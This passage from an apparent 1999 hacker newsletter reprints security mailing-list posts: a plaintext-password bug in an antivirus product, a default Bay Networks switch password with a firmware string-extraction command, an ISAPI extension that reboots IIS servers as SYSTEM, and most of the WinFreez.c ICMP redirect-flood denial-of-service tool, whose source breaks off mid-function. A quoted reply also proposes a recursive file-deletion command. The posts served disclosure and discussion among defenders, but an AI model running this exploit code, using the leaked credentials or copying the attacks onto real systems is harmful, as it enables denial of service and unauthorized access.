  1504.                       
  1505.       That could mean a number of different things, says Dr. Peter Tippett,
  1506.       president of ISCA, Inc., a computer security firm. The attacks arenÆt
  1507.       that bad, the person doing it doesnÆt want to take credit, or the 
  1508.       attacks are coming from overseas. The latest assaults could have
  1509.       come from foreign governments, terrorist organizations or from the 
  1510.       proverbial mischievous teenager. 
  1511.  
  1512.       Recon vs. Frontal Assault What exactly constitutes an attack? Hackers
  1513.       customarily scan remote computer systems, looking for security holes 
  1514.       through which to send or retrieve data. Tools for such scans are 
  1515.       readily available for downloading from the Internet. 
  1516.                        
  1517.        These scanners basically take known holes and hit a server, one after
  1518.       another, asking it if these holes are open, says an independent hacker
  1519.       known as Bronc Buster. They may or may not be there, but as far as logs
  1520.       on systems will show, unless you are an experienced admin and can tell 
  1521.       the difference, you are being attacked.
  1522.  
  1523.        The Pentagon, however, does not differentiate  between scans, which is
  1524.       essentially cyberspace reconnaissance, and full attacks, when a malicious
  1525.       system cracker actively attempts to break through security. Tippett 
  1526.       points out that scans are useful for later attack, and that determined 
  1527.       hackers have found ways to conduct scans without setting off alarms. 
  1528.       Most servers have thousands of accounts, and thus thousands of entry
  1529.       points. If a hacker takes his time, and only pings a few entry points 
  1530.       every so often, he can usually avoid notice. 
  1531.            
  1532.            In recent congressional testimony, Hamre said Defense Department
  1533.       computers are attacked upwards of 60 times per week, with about 10 such
  1534.       attacks requiring additional investigation. He did not differentiate 
  1535.       between scans or infiltration attempts. 
  1536.  
  1537.       From Russia With Love
  1538.       
  1539.       The theory that the recent attacks came from Russia is also questionable.
  1540.       When it comes to the Internet, geography quickly becomes irrelevant. 
  1541.       Hacking tools, some of which are readily available online, could allow a
  1542.       would-be hacker to fake his own locale information, or channel his attack
  1543.       through servers all around the world. I donÆt know how the Pentagon would
  1544.       know where the attacks come from, Tippett says. If you have access to 
  1545.       enough servers, itÆs relatively easy to re-route your connection to make 
  1546.       it appear youÆre in Russia, when you could just be down the street. 
  1547.            
  1548.            Rep. Curt Weldon, R-Pa., who chairs the subcommittee of the House 
  1549.       Armed Services Committee where Hamre testified, acknowledges that the 
  1550.       starting point of the recent computer assaults still in doubt. But he
  1551.       contends the new attacks represent a new kind of warfare, in which less
  1552.       powerful nations could gain an edge against the United States by hacking
  1553.       into and knocking out key computer systems. This appears to be a 
  1554.       coordinated effort to break into our computer system, and we not giving
  1555.       the problem the kind of visibility it needs, Weldon says. This Y2K thing
  1556.       is a piece of cake compare to this. 
  1557.            
  1558.            OXBlood Ruffin, foreign minister for the hacker group Cult of the 
  1559.       Dead Cow, has another view. It smells like someone is looking for increased
  1560.       budgets, Ruffin wrote in an e-mail, calling HamreÆs alarms a typical crying
  1561.       game from the military. æHackingÆ Into a Government Computer According to a
  1562.       Philadelphia-based hacker who calls himself El Diablo, government computers
  1563.       are far too quick to register an attack. El Diablo, affiliated with the
  1564.       HologramNation hacker group, should know: he accessed the White House Web 
  1565.       server. 
  1566.             
  1567.             Instead of using a a Web browser, El Diablo accessed the whitehouse.gov
  1568.       host address via Telnet. Telnet is a common way for a user to log directly 
  1569.       into a server, accessing the serverÆs systems remotely. Once dialed in,
  1570.       El Diablo encountered the following warning:  You are about to access a U.S.
  1571.       Government computer system. Access to this system is restricted to authorized
  1572.       users only. Anyone who accesses this system without authorization, or exceeds
  1573.       authorized access, could be subject to a fine or imprisonment, or both, under
  1574.       Public Law 98-473.
  1575.        
  1576.             The message went on to say that the user was being monitored. 
  1577.       The computer then asked for a username and  password, at which point El Diablo
  1578.       exited. What this seems to say is that I just æhackedÆ into the government 
  1579.       computers, he says. The hackers [accessing Pentagon computers] could have 
  1580.       simply done that, and the government could have blown this waaaaaay out of
  1581.        proportion. 
  1582.            
  1583.             Many people Telnet into their work computers  itÆs not some obscure
  1584.       hacker tool. Yet the White House says what El Diablo did is a potential attack. 
  1585.       IÆm sure lots of people Telnet into that server, either to just have a look,
  1586.       or they access it by mistake, and thatÆs OK, said White House spokesman Mark
  1587.       Kitchens. But that is still considered an attempt at breaching security. 
  1588.  
  1589.  
  1590.                    
  1591.       @HWA
  1592.       
  1593.  04.1 Passwords visible in plaintext in Cheyenne's Anti-Virus Agent for Exchange.
  1594.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1595.        
  1596.        Date: Fri, 5 Mar 1999 12:19:59 -0800
  1597.        From: JEK <jkolde@EARTHLINK.NET>
  1598.        To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  1599.        Subject: Cheyenne InocuLAN for Exchange plain text password still there
  1600.        
  1601.        
  1602.        This dates back to Ron Watkins' post on 12/16/98 regarding the plain text
  1603.        account name/password left in the exchverify.log file by the installation of
  1604.        Cheyenne's Anti-Virus Agent for Exchange.
  1605.        
  1606.        Quote from Ron:
  1607.        "I was called on Monday by Brian Linton at Computer Associates.  He says
  1608.        that the plaintext admin password was put into c:\exchverify.log by earlier
  1609.        versions of the Arcserve Exchange client, but that build 57 (the most recent
  1610.        version) puts only the length there.  It does not erase that file as new
  1611.        installs are done, but rather appends, which is why some folks still had
  1612.        that plaintext password even after installing the most recent build."
  1613.        
  1614.        I am currently testing AV Agent for Exchange and installed what I was told
  1615.        was the most recent version (build 64) on a clean NT 4.0/SP4/Exchange 5.5
  1616.        server running InocuLAN for NT 4.0 (build 375).  This was a fresh build and
  1617.        *not* upgraded from earlier versions of any software.  The exchverify.log
  1618.        file is still there and still contains the account name and password in
  1619.        clear text - NOT merely the length as stated above.
  1620.        
  1621.        JEK, MCSE
  1622.  
  1623.  
  1624.       @HWA
  1625.       
  1626.  04.2 Default passwords in Bay networks switches
  1627.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1628.  
  1629.        Date: Wed, 10 Mar 1999 14:48:58 -0800
  1630.        From: Jan B. Koum <jkb@BEST.COM>
  1631.        To: BUGTRAQ@netspace.org
  1632.        Subject: Default password in Bay Networks switches.
  1633.        
  1634.                Ok.. so you would think after 3Com $%#& up last year of inserting
  1635.                default password into firmware vendors would learn their lesson?
  1636.                [See http://geek-girl.com/bugtraq/1998_2/0340.html for 3com rant]
  1637.        
  1638.                Hah! Welcome to the world of strings and Bay Networks firmware
  1639.                files. I have looked at some bay networks switches and see that
  1640.                the following have default password of "NetICs"
  1641.        
  1642.        BayStack 350T   HW:RevC  FW:V1.01 SW:V1.2.0.10
  1643.        BayStack 350T   HW:RevC  FW:V1.01 SW:V2.0.0.15
  1644.        
  1645.                These however I was not able to find defaults for:
  1646.        
  1647.        BayStack 350-24T HW:RevA  FW:V1.04 SW:V1.0.0.2
  1648.        Bay Networks BayStack 303 Ethernet Switch
  1649.        BayStack 28115/ADV Fast Ethernet Switch
  1650.        
  1651.                If you have firmware images for the above, just
  1652.        
  1653.        % strings *.img | grep -B5 "Invalid Password"
  1654.        
  1655.                Something similar to this command might give you the passwd.
  1656.                Of course I don't have to tell you about how bad it is when
  1657.                someone can control your network infrastructure (switches).
  1658.        
  1659.                I don't have much experience with Bay hardware (in fact, I have
  1660.                none - someone at work just asked me to help them get into a
  1661.                switch for which they forgot the password). If someone can
  1662.                shed some light on this topic, it would be great.
  1663.        
  1664.                And yes, I consider this to be a backdoor - wouldn't you call it
  1665.                a backdoor if Solaris had default password for root logins?
  1666.                How can vendors in 1999 even THINK about something as stupid as
  1667.                inserting a default password like this into a switch!?!?
  1668.                Granted - I am almost sure Bay didn't have evil intentions for
  1669.                the use .. but still. I am speechless.
  1670.        
  1671.        -- Yan
  1672.        
  1673.        
  1674.        P.S. - Greetz to the inhabitants of #!adm and #!w00w00
  1675.        
  1676.        ------------------------------------------------------------------------------
  1677.        
  1678.        Date: Wed, 10 Mar 1999 17:06:05 -0700
  1679.        From: Dax Kelson <dkelson@INCONNECT.COM>
  1680.        To: BUGTRAQ@netspace.org
  1681.        Subject: Re: Default password in Bay Networks switches.
  1682.        
  1683.        On Wed, 10 Mar 1999, Jan B. Koum wrote:
  1684.        
  1685.        >       Ok.. so you would think after 3Com $%#& up last year of inserting
  1686.        >       default password into firmware vendors would learn their lesson?
  1687.        >       [See http://geek-girl.com/bugtraq/1998_2/0340.html for 3com rant]
  1688.        >
  1689.        >       Hah! Welcome to the world of strings and Bay Networks firmware
  1690.        >       files. I have looked at some bay networks switches and see that
  1691.        >       the following have default password of "NetICs"
  1692.        
  1693.        The Bay Networks case number for this bug/oversight is: 990310-614
  1694.        
  1695.        Normally "backdoor" passwords on Bay gear only work through the console.
  1696.        
  1697.        Dax Kelson
  1698.        Internet Connect, Inc.
  1699.        
  1700.        ------------------------------------------------------------------------------
  1701.        
  1702.        Date: Wed, 10 Mar 1999 17:16:53 -0800
  1703.        From: Jon Green <jogreen@NORTELNETWORKS.COM>
  1704.        To: BUGTRAQ@netspace.org
  1705.        Subject: Re: Default password in Bay Networks switches.
  1706.        
  1707.        >       And yes, I consider this to be a backdoor - wouldn't you call it
  1708.        >       a backdoor if Solaris had default password for root logins?
  1709.        >       How can vendors in 1999 even THINK about something as stupid as
  1710.        >       inserting a default password like this into a switch!?!?
  1711.        >       Granted - I am almost sure Bay didn't have evil intentions for
  1712.        >       the use .. but still. I am speechless.
  1713.        
  1714.        This was fixed in version 2.0.3.4 of the BS350 code last November.
  1715.        The backdoor is still there for console access, but not for telnet.
  1716.        This problem only affected the Baystack 350T and 350F, it did not
  1717.        affect the 350-24T or 450.  Also, note that the 350 has always had the
  1718.        ability to limit telnet logins to certain source addresses; it is
  1719.        recommended that that feature be used.
  1720.        
  1721.        Software upgrades for the 350 can be found at
  1722.        http://support.baynetworks.com under Software.  If you don't
  1723.        have a support contract, call (800) 2LANWAN.
  1724.        
  1725.        -Jon
  1726.        
  1727.        
  1728.        -------------------------------------------------------------------
  1729.        Jon Green                               4301 Great America Pkwy
  1730.        Senior Competitive Test Engineer        Santa Clara, CA 95054
  1731.        Nortel Networks                         (408) 495-2618 Voice
  1732.        jogreen@nortelnetworks.com              (408) 495-4540 Fax
  1733.        -------------------------------------------------------------------
  1734.        
  1735.       @HWA
  1736.       
  1737.  04.3 ISAPI Exploit code 
  1738.       ~~~~~~~~~~~~~~~~~~
  1739.       
  1740.       Date: Tue, 9 Mar 1999 10:54:47 -0500
  1741.       From: Fabien Royer <fabienr@BELLATLANTIC.NET>
  1742.       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  1743.       Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM
  1744.       
  1745.       > -----Original Message-----
  1746.       > From: Patrick CHAMBET [mailto:pchambet@club-internet.fr]
  1747.       > Sent: Tuesday, March 09, 1999 5:27 AM
  1748.       > To: Fabien Royer
  1749.       > Cc: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  1750.       > Subject: Re: ISAPI Extension vulnerability allows to execute code as
  1751.       > SYSTEM
  1752.       >
  1753.       >
  1754.       > Any proof ? Any sample ? Any work around ?
  1755.       > How can we test our servers ?
  1756.       
  1757.       Using VC++, create an ISAPI extension project and call it CRbExtension.
  1758.       Replace GetExtensionVersion() and Default() with the code below. Compile it
  1759.       to something simple, like rb.dll.
  1760.       Place it on your web server and invoke it from your browser like this
  1761.       http://your.machine.name/scripts/rb.dll?
  1762.       Note: if you are using IE4.0, don't call this from the machine that is
  1763.       running the web server otherwise, the next time you log in, IE will recall
  1764.       the last URL and you'll reboot again.
  1765.       
  1766.       The workaround is to NEVER give users (or customers) the ability to use
  1767.       ISAPI extensions if you allow them to upload CGIs to customize their home
  1768.       page. An .exe on the other hand is much safer (is coded correctly).
  1769.       
  1770.       Fabien.
  1771.       
  1772.       BOOL CRbExtension::GetExtensionVersion(HSE_VERSION_INFO* pVer)
  1773.       {
  1774.               HANDLE hToken;              // handle to process token
  1775.               TOKEN_PRIVILEGES tkp;       // pointer to token structure
  1776.       
  1777.               // Get the current process token handle so we can get shutdown // privilege.
  1778.               OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
  1779.       
  1780.               // Get the LUID for shutdown privilege.
  1781.               LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid);
  1782.       
  1783.               tkp.PrivilegeCount = 1;  // one privilege to set
  1784.               tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
  1785.       
  1786.               // Get shutdown privilege for this process.
  1787.               AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0);
  1788.       
  1789.               ExitWindowsEx(EWX_REBOOT,0);
  1790.       
  1791.               // Disable shutdown privilege.  tkp.Privileges[0].Attributes = 0;
  1792.               AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0);
  1793.       
  1794.               // Call default implementation for initialization
  1795.               CHttpServer::GetExtensionVersion(pVer);
  1796.       
  1797.               // Load description string
  1798.               TCHAR sz[HSE_MAX_EXT_DLL_NAME_LEN+1];
  1799.               ISAPIVERIFY(::LoadString(AfxGetResourceHandle(),IDS_SERVER, sz,HSE_MAX_EXT_DLL_NAME_LEN));
  1800.               _tcscpy(pVer->lpszExtensionDesc, sz);
  1801.               return TRUE;
  1802.       }
  1803.       
  1804.       void CRbExtension::Default(CHttpServerContext* pCtxt)
  1805.       {
  1806.               StartContent(pCtxt);
  1807.               WriteTitle(pCtxt);
  1808.       
  1809.               *pCtxt << _T("Reboot<br>");
  1810.       
  1811.               EndContent(pCtxt);
  1812.       }
  1813.       
  1814.       >
  1815.       > Patrick Chambet
  1816.       > IBM Global Services
  1817.       >
  1818.       
  1819.       >
  1820.       > >There's a vulnerability in IIS (and other WEB servers executing
  1821.       > as SYSTEM)
  1822.       > >that allows to execute an ISAPI extension in the security context of the
  1823.       > >server itself instead of the security context of IUSR_WHATEVER.
  1824.       > How is this
  1825.       > >possible: when the server loads an ISAPI extension the first
  1826.       > time, it calls
  1827.       > >GetExtensionVersion(). During the call to this function, an attacker can
  1828.       > >execute any code as SYSTEM. This is a problem if you're an ISP doing
  1829.       > hosting
  1830.       > >with web servers offering ISAPI support (IIS, Apache 1.3.4, etc.
  1831.       > ) because
  1832.       > >any user allowed to place a "CGI" on the server can take over. Of course,
  1833.       > >this problem is not limited to ISPs.
  1834.       > >Fabien.
  1835.       
  1836.       -=- Prior Discussion & further details ;
  1837.       
  1838.       Date: Mon, 8 Mar 1999 11:27:48 -0500
  1839.       From: Fabien Royer <fabienr@BELLATLANTIC.NET>
  1840.       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  1841.       Subject: ISAPI Extension vulnerability allows to execute code as SYSTEM
  1842.       
  1843.       
  1844.       There's a vulnerability in IIS (and other WEB servers executing as SYSTEM)
  1845.       that allows to execute an ISAPI extension in the security context of the
  1846.       server itself instead of the security context of IUSR_WHATEVER. How is this
  1847.       possible: when the server loads an ISAPI extension the first time, it calls
  1848.       GetExtensionVersion(). During the call to this function, an attacker can
  1849.       execute any code as SYSTEM. This is a problem if you're an ISP doing hosting
  1850.       with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. ) because
  1851.       any user allowed to place a "CGI" on the server can take over. Of course,
  1852.       this problem is not limited to ISPs.
  1853.       Fabien.
  1854.       
  1855.       --------------------------------------------------------------------------------
  1856.       
  1857.       Date: Tue, 9 Mar 1999 00:32:03 -0500
  1858.       From: Fabien Royer <fabienr@BELLATLANTIC.NET>
  1859.       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  1860.       Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM
  1861.       
  1862.       > -----Original Message-----
  1863.       > From: Scott L. Krabler [mailto:scottk@visi.com]
  1864.       > Sent: Monday, March 08, 1999 11:41 PM
  1865.       > To: Fabien Royer; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  1866.       > Subject: RE: ISAPI Extension vulnerability allows to execute code as
  1867.       > SYSTEM
  1868.       >
  1869.       >
  1870.       
  1871.       > By this, I'm assuming the required safeguard would be to only implement
  1872.       > ISAPI filters whose contents are known. Since ISAPI filters can only be
  1873.       
  1874.       Typically, filters and extensions fulfill different purposes. For instance,
  1875.       you would not implement an complete WEB based application as a filter for
  1876.       performance reasons. Filters see all http "traffic" while extensions only
  1877.       see the http traffic that is directed to them.
  1878.       
  1879.       Unless you have written the filter yourself (or someone trusted in your
  1880.       organization), you can't know if a filter is 100% secure either.
  1881.       
  1882.       > installed locally(?) there shouldn't be any general risk. Yes?
  1883.       
  1884.       This is not that simple. You can remotely install a filter under IIS if you
  1885.       can cause the following sequence of events to occur:
  1886.       
  1887.       1) Place the filter .dll in a location accessible from the web server.
  1888.       2) Update the registry to register the new filter.
  1889.       3) Cause a reboot of the machine or stop/start IIS.
  1890.       
  1891.       All of this can be done from the GetExtensionVersion() call mentioned
  1892.       earlier.
  1893.       
  1894.       Finally, you can host a filter *AND* an extension in the same .dll.
  1895.       
  1896.       Fabien.
  1897.       
  1898.       >
  1899.       > -----Original Message-----
  1900.       > From: Windows NT BugTraq Mailing List
  1901.       > [mailto:NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM]On Behalf Of Fabien Royer
  1902.       > Sent: Monday, March 08, 1999 10:28 AM
  1903.       > To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  1904.       > Subject: ISAPI Extension vulnerability allows to execute code as SYSTEM
  1905.       >
  1906.       >
  1907.       > There's a vulnerability in IIS (and other WEB servers executing as SYSTEM)
  1908.       > that allows to execute an ISAPI extension in the security context of the
  1909.       > server itself instead of the security context of IUSR_WHATEVER.
  1910.       > How is this
  1911.       > possible: when the server loads an ISAPI extension the first
  1912.       > time, it calls
  1913.       > GetExtensionVersion(). During the call to this function, an attacker can
  1914.       > execute any code as SYSTEM. This is a problem if you're an ISP
  1915.       > doing hosting
  1916.       > with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. ) because
  1917.       > any user allowed to place a "CGI" on the server can take over. Of course,
  1918.       > this problem is not limited to ISPs.
  1919.       > Fabien.
  1920.       >
  1921.       
  1922.       --------------------------------------------------------------------------------
  1923.       
  1924.       Date: Wed, 10 Mar 1999 18:28:24 -0500
  1925.       From: Fabien Royer <fabienr@BELLATLANTIC.NET>
  1926.       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  1927.       Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM
  1928.       
  1929.       Sure, however the executable that you are going to execute will run in a
  1930.       separate address space and if it is spawned by IIS, it will run in the
  1931.       security context of IUSR_xxx instead of SYSTEM. This is the *major*
  1932.       difference between what you can do with the .dll approach and the .exe
  1933.       approach.
  1934.       
  1935.       Fabien.
  1936.       
  1937.       > I don't know that .EXE's are that much safer.  How about this:
  1938.       >
  1939.       > I upload 4nt.exe  (Command.Com/CMD.Exe replacement program)
  1940.       > I write an EXE that calls it and runs the command 'reboot'
  1941.       > or even a 'del /zsx c:\*.*' (Which will recursively delete all
  1942.       > files that aren't currently in use)
  1943.       >
  1944.       > Same idea ... different way about it.
  1945.       >
  1946.       > Being a developer and having the tools available, I require that
  1947.       > I get to compile the code myself.  That way, I can scan through
  1948.       > the code to see if it's trying to do anything malicious.
  1949.       > Granted, this isn't 100% foolproof, but it does help!
  1950.       >
  1951.       > Charlie
  1952.       
  1953.  
  1954.  
  1955.       @HWA 
  1956.       
  1957.  04.4 Winfreez.c new exploit code for win9x and NT 
  1958.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1959.       
  1960.       The full original source code is followed by a Solaris version and
  1961.       further discussion, from Packetstorm/Bugtraq.
  1962.       
  1963.       (March 11th 1999)
  1964.       http://www.genocide2600.com/~tattooman/new.shtml#latest
  1965.       
  1966.       /*
  1967.        WinFreez.c by Delmore <delmore@moscowmail.com>
  1968.       
  1969.        ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box
  1970.        in LAN.
  1971.       
  1972.        Usage: winfreez sendtoip sendfromip time
  1973.        where <sendtoip> is victim host, <sendfromip> is router
  1974.        for victim host, <time> is time in seconds to freeze victim.
  1975.       
  1976.        Note:
  1977.        I've written small exploit for freeze win9x/nt boxes in LAN.
  1978.        Proggy initiates ICMP/Redirect-host messages storm from router
  1979.        (use router ip). Windows will receive redirect-host messages
  1980.        and change own route table, therefore it will be frozen
  1981.        or slowly working during this time.
  1982.       
  1983.        On victim machine route table changes viewing with:
  1984.        ROUTE PRINT
  1985.        command in ms-dos box.
  1986.       
  1987.        Exploit show different result for different system configuration.
  1988.       
  1989.        System results:
  1990.       
  1991.        p200/16ram/win95osr2 is slowly execute application
  1992.        after 20 seconds of storm.
  1993.       
  1994.        p233/96ram/nt4-sp4 is slowly working after 30
  1995.        seconds of storm.
  1996.       
  1997.        p2-266/64ram/win95 working slowly and can't normal execute
  1998.        application.
  1999.       
  2000.       
  2001.        Compiled on RedHat Linux 5, Kernel 2.0.35 (x86)
  2002.        gcc ./winfreez.c -o winfreez
  2003.       
  2004.        --- for Slackware Linux, Kernel 2.0.30
  2005.        If you can't compile due to ip_sum not defined errors,
  2006.        replace (line 207):
  2007.         ip->ip_sum = 0;
  2008.        to line:
  2009.         ip->ip_csum = 0;
  2010.        ---
  2011.       
  2012.        Soldiers Of Satan group
  2013.        Russia, Moscow State University, 05 march 1999
  2014.        http://sos.nanko.ru
  2015.       
  2016.        Thanx to Mark Henderson.
  2017.       
  2018.        */
  2019.       
  2020.       #include <stdio.h>
  2021.       #include <stdlib.h>
  2022.       #include <time.h>
  2023.       #include <string.h>
  2024.       
  2025.       #include <sys/types.h>
  2026.       #include <sys/socket.h>
  2027.       #include <netdb.h>
  2028.       #include <netinet/in.h>
  2029.       #include <netinet/in_systm.h>
  2030.       #include <netinet/ip.h>
  2031.       #include <netinet/ip_icmp.h>
  2032.       
  2033.       /*
  2034.        * Structure of an icmp header (from sparc header).
  2035.        */
  2036.       
  2037.       struct icmp {
  2038.        u_char icmp_type; /* type of message, see below */
  2039.        u_char icmp_code; /* type sub code */
  2040.        u_short icmp_cksum; /* ones complement cksum of struct */
  2041.       
  2042.       union {
  2043.        u_char ih_pptr; /* ICMP_PARAMPROB */
  2044.        struct in_addr ih_gwaddr; /* ICMP_REDIRECT */
  2045.        struct ih_idseq {
  2046.        n_short icd_id;
  2047.        n_short icd_seq;
  2048.       } ih_idseq;
  2049.       
  2050.       int ih_void;
  2051.       } icmp_hun;
  2052.       
  2053.       #define icmp_pptr icmp_hun.ih_pptr
  2054.       #define icmp_gwaddr icmp_hun.ih_gwaddr
  2055.       #define icmp_id icmp_hun.ih_idseq.icd_id
  2056.       #define icmp_seq icmp_hun.ih_idseq.icd_seq
  2057.       #define icmp_void icmp_hun.ih_void
  2058.       
  2059.       union {
  2060.        struct id_ts {
  2061.        n_time its_otime;
  2062.        n_time its_rtime;
  2063.        n_time its_ttime;
  2064.       } id_ts;
  2065.       
  2066.       struct id_ip  {
  2067.       struct ip idi_ip;
  2068.       /* options and then 64 bits of data */
  2069.       } id_ip;
  2070.       
  2071.       u_long id_mask;
  2072.       char id_data[1];
  2073.       } icmp_dun;
  2074.       
  2075.       #define icmp_otime icmp_dun.id_ts.its_otime
  2076.       #define icmp_rtime icmp_dun.id_ts.its_rtime
  2077.       #define icmp_ttime icmp_dun.id_ts.its_ttime
  2078.       #define icmp_ip icmp_dun.id_ip.idi_ip
  2079.       #define icmp_mask icmp_dun.id_mask
  2080.       #define icmp_data icmp_dun.id_data
  2081.       
  2082.       };
  2083.       
  2084.       
  2085.       u_short in_cksum (u_short *addr, int len);
  2086.       void attack( char *sendtoip, char *sendfromip, time_t wtime, int s );
  2087.       
  2088.       
  2089.       void main (int argc, char **argv)
  2090.       {
  2091.         time_t wtime;
  2092.         char *sendtoip, *sendfromip;
  2093.         int s, on;
  2094.       
  2095.         if (argc != 4)
  2096.           {
  2097.             fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]);
  2098.             exit (1);
  2099.           }
  2100.       
  2101.         sendtoip = (char *)malloc(strlen(argv[1]) + 1);
  2102.         strcpy(sendtoip, argv[1]);
  2103.       
  2104.         sendfromip = (char *)malloc(strlen(argv[2]) + 1);
  2105.         strcpy(sendfromip, argv[2]);
  2106.       
  2107.         wtime = atol(argv[3]);
  2108.       
  2109.         if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
  2110.           {
  2111.             fprintf (stderr, "socket creation error\n" );
  2112.             exit (1);
  2113.           }
  2114.       
  2115.       #ifdef IP_HDRINCL
  2116.         if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0)
  2117.           {
  2118.             fprintf (stderr, "sockopt IP_HDRINCL error\n" );
  2119.             exit (1);
  2120.           }
  2121.       #endif
  2122.       
  2123.         printf("winfreez by Delmore, <delmore@moscowmail.com>\n");
  2124.         printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n");
  2125.         printf("sendto = %s\n", sendtoip);
  2126.         printf("sendfrom = %s\n", sendfromip);
  2127.         printf("time = %i s\n", wtime);
  2128.       
  2129.         attack( sendtoip, sendfromip, wtime, s );
  2130.       
  2131.         free( (void *) sendtoip );
  2132.         free( (void *) sendfromip );
  2133.       }
  2134.       
  2135.       
  2136.       void attack( char *sendtoip, char *sendfromip, time_t wtime, int s )
  2137.       {
  2138.         time_t curtime, endtime;
  2139.         int i1, i2, i3, i4;
  2140.         char redir[21];
  2141.         char buf[100];
  2142.         struct ip *ip = (struct ip *) buf;
  2143.         struct icmp *icmp = (struct icmp *) (ip + 1);
  2144.         struct hostent *hp;
  2145.         struct sockaddr_in dst;
  2146.       
  2147.         if(wtime==0) return;
  2148.       
  2149.         if ((hp = gethostbyname (sendtoip)) == NULL)
  2150.          if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1)
  2151.            {
  2152.             fprintf (stderr, "%s: unknown sendto\n", sendtoip);
  2153.             exit (1);
  2154.            }
  2155.       
  2156.         if ((hp = gethostbyname (sendfromip)) == NULL)
  2157.          if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1)
  2158.            {
  2159.             fprintf (stderr, "%s: unknown sendfrom\n", sendfromip);
  2160.             exit (1);
  2161.            }
  2162.       
  2163.         endtime = time(NULL) + wtime;
  2164.       
  2165.         srand((unsigned int) endtime);
  2166.       
  2167.        do {
  2168.         bzero (buf, sizeof buf);
  2169.       
  2170.         /* sendto/gateway */
  2171.         hp = gethostbyname (sendtoip);
  2172.         bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
  2173.         bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length);
  2174.       
  2175.         /* sendfrom */
  2176.         hp = gethostbyname (sendfromip);
  2177.         bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);
  2178.       
  2179.         /* generate redirect*/
  2180.         i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0));
  2181.         i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
  2182.         i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
  2183.         i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
  2184.       
  2185.         bzero (redir, sizeof redir);
  2186.         sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 );
  2187.       
  2188.         hp = gethostbyname (redir);
  2189.         bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length);
  2190.       
  2191.         ip->ip_v = 4;
  2192.         ip->ip_hl = sizeof *ip >> 2;
  2193.         ip->ip_tos = 0;
  2194.         ip->ip_len = htons (sizeof buf);
  2195.         ip->ip_id = htons (4321);
  2196.         ip->ip_off = 0;
  2197.         ip->ip_ttl = 255;
  2198.         ip->ip_p = 1;
  2199.         ip->ip_sum = 0;               /* kernel fills this in */
  2200.       
  2201.         bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof(ip->ip_dst.s_addr));
  2202.         icmp->icmp_ip.ip_v = 4;
  2203.         icmp->icmp_ip.ip_hl = sizeof *ip >> 2;
  2204.         icmp->icmp_ip.ip_tos = 0;
  2205.         icmp->icmp_ip.ip_len = htons (100);   /* doesn't matter much */
  2206.         icmp->icmp_ip.ip_id = htons (3722);
  2207.         icmp->icmp_ip.ip_off = 0;
  2208.         icmp->icmp_ip.ip_ttl = 254;
  2209.         icmp->icmp_ip.ip_p = 1;
  2210.         icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip);
  2211.       
  2212.         dst.sin_addr = ip->ip_dst;
  2213.         dst.sin_family = AF_INET;
  2214.       
  2215.         icmp->icmp_type = ICMP_REDIRECT;
  2216.         icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */
  2217.         icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof(*ip));
  2218.       
  2219.         if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) < 0 )
  2220.           {
  2221.             fprintf (stderr, "sendto error\n");
  2222.             exit (1);
  2223.           }
  2224.       
  2225.         }while (time(NULL)!=endtime);
  2226.       }
  2227.       
  2228.       /*
  2229.        * in_cksum -- Checksum routine for Internet Protocol family headers (C
  2230.        * Version) - code from 4.4 BSD
  2231.        */
  2232.       u_short in_cksum (u_short *addr, int len)
  2233.       {
  2234.         register int nleft = len;
  2235.         register u_short *w = addr;
  2236.         register int sum = 0;
  2237.         u_short answer = 0;
  2238.       
  2239.         /*
  2240.          * Our algorithm is simple, using a 32 bit accumulator (sum), we add
  2241.          * sequential 16 bit words to it, and at the end, fold back all the
